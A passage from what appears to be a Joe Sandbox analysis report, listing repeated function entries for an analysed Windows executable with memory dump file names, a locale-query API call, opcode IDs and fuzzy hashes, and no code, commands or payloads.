                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: cac0f53bd179bcba497deeb3be88a77d39c2c87ea4dc89df76a35ef6b7fbe0c5
                                                                                                      • Instruction ID: 9da2875ea15e478636e6a19f8e559aaded68c83ea5b3640cafb6498ed860e9bb
                                                                                                      • Opcode Fuzzy Hash: cac0f53bd179bcba497deeb3be88a77d39c2c87ea4dc89df76a35ef6b7fbe0c5
                                                                                                      • Instruction Fuzzy Hash: BC41E4B1C082289AEB648A15DC94BFBB774EB45310F1040FFD90EA2280EB3C5EC1CE95
                                                                                                      Function 0041606E Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ff4c98d912c2b6541e87356ce208480de176fdf1186944331926cde86bbe301e
                                                                                                      • Instruction ID: 5f2df81378430355b59e9b456b65377848fe768400373103bf6390f32f58e200
                                                                                                      • Opcode Fuzzy Hash: ff4c98d912c2b6541e87356ce208480de176fdf1186944331926cde86bbe301e
                                                                                                      • Instruction Fuzzy Hash: 655117B5E052288BEB24CF14CD80BE9B7B5EB84304F1141EAD84DA7391D739AED1CE59
                                                                                                      Function 004174F6 Relevance: 1.6, APIs: 1, Instructions: 117nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: 3a087ecd2bfdb5452127eb01209bcfc4d2c4dee7cced3603f0f6717014f45314
                                                                                                      • Instruction ID: e8d2f0aca4c6a908fbc8ad0fc926e13e3dcf399910eac4602b219dd3342ad4b2
                                                                                                      • Opcode Fuzzy Hash: 3a087ecd2bfdb5452127eb01209bcfc4d2c4dee7cced3603f0f6717014f45314
                                                                                                      • Instruction Fuzzy Hash: 0B41D271D082289AE7649A14DC987FBB774EB41310F1040FBD90E67281EB381EC1DF96
                                                                                                      Function 00417507 Relevance: 1.6, APIs: 1, Instructions: 110nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: 112b160d1626da5a870caa0e698cf6330bbec40b50cd1f380d3d79857dc7e202
                                                                                                      • Instruction ID: f0f47d314889777b8177ff0ea7399bd24bebbf18625ed2c903eff756bb8dc78d
                                                                                                      • Opcode Fuzzy Hash: 112b160d1626da5a870caa0e698cf6330bbec40b50cd1f380d3d79857dc7e202
                                                                                                      • Instruction Fuzzy Hash: 7B41AE71C092289AEB649A14DC98BFBBB74EB45310F1040BBD90E67280EB381EC1DF95
                                                                                                      Function 0041770A Relevance: 1.6, APIs: 1, Instructions: 108nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: af06b1a9ccdba32f813e4504962c9287a280c413d35f2862e971bf404e5d8d37
                                                                                                      • Instruction ID: d75f22a1159e35b4f3fa64951250e86a2128f75cb7e7253d0b5bfb57b9233f5c
                                                                                                      • Opcode Fuzzy Hash: af06b1a9ccdba32f813e4504962c9287a280c413d35f2862e971bf404e5d8d37
                                                                                                      • Instruction Fuzzy Hash: 2341C2B1D092289AE7649A14DC94BFBB774EB45310F1040FBD90E67280EB381EC1CE96
                                                                                                      Function 00416F99 Relevance: 1.6, APIs: 1, Instructions: 99nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: 5068afb8254f331a7626a4e21c68d8440fa4038c23e70fddec315f9476b3b93d
                                                                                                      • Instruction ID: eafd9a4f8971bb000db2c359721c74887116da78274aa45100b40805d2ed5c42
                                                                                                      • Opcode Fuzzy Hash: 5068afb8254f331a7626a4e21c68d8440fa4038c23e70fddec315f9476b3b93d
                                                                                                      • Instruction Fuzzy Hash: 413168B2D091685AF3548A25DD54BFB7B35EB82310F1040BFD84E16180EB3C1EC3CAA6
                                                                                                      Function 004177A1 Relevance: 1.6, APIs: 1, Instructions: 98nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: 5f1f73b8a4dfdd3198cc2378d410cab2cf8cee1dec9ae0082232874bed93daf6
                                                                                                      • Instruction ID: 013cba5752ef4e6ddef668a28707986f309a431396bf0d84dab338be8d47dcc2
                                                                                                      • Opcode Fuzzy Hash: 5f1f73b8a4dfdd3198cc2378d410cab2cf8cee1dec9ae0082232874bed93daf6
                                                                                                      • Instruction Fuzzy Hash: 1D31C171D082289AEB649E14DC94BFBB774EB45310F1080FAD90A67281EB381EC2CF95
                                                                                                      Function 00417A96 Relevance: 1.6, APIs: 1, Instructions: 91nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: d8fa60f766b4ce349577cb84911dbb263f6d10b44539bac6783974e5f93339e3
                                                                                                      • Instruction ID: bcbcc08389e97a3bae2ea5b8e264dc2378f765c01d2f2acab22a8988d8ca5cf6
                                                                                                      • Opcode Fuzzy Hash: d8fa60f766b4ce349577cb84911dbb263f6d10b44539bac6783974e5f93339e3
                                                                                                      • Instruction Fuzzy Hash: FE31C171D091288AEB648B55DC546FBB775EB46314F2040FFD80E66281EB381EC2CF96
                                                                                                      Function 004177B0 Relevance: 1.6, APIs: 1, Instructions: 90nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: ae64d8d4080e8e513dbac400ee1e509ebcd11810d0037a688e8d9a7dab7abcd5
                                                                                                      • Instruction ID: e5d8aafcc44503b8348dfb5635f668865aa42393985806d46af9af99d21fc1f5
                                                                                                      • Opcode Fuzzy Hash: ae64d8d4080e8e513dbac400ee1e509ebcd11810d0037a688e8d9a7dab7abcd5
                                                                                                      • Instruction Fuzzy Hash: 4A31C0B5C092289AE7649F24DC946FAB774EB06311F1040BED90A66281EB381EC5CF95
                                                                                                      Function 00417A35 Relevance: 1.6, APIs: 1, Instructions: 88nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DefaultLocaleQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 2949231068-0
                                                                                                      • Opcode ID: 0bb16a2ebe32b71c6d6e44754614d56065919450e8827c4016e6a5a9600906e1
                                                                                                      • Instruction ID: 8ebe2da5edca39e20b729ccd93ccbdf6bd65a0c139329713e4f1e425c161a08f
                                                                                                      • Opcode Fuzzy Hash: 0bb16a2ebe32b71c6d6e44754614d56065919450e8827c4016e6a5a9600906e1
                                                                                                      • Instruction Fuzzy Hash: 0331C371D091288AEB648B54DC547FBB771EF45310F1040FAC80E62281EB381EC2CE96
                                                                                                      Function 004177D2 Relevance: 1.6, APIs: 1, Instructions: 85nativeCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 00417B2D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
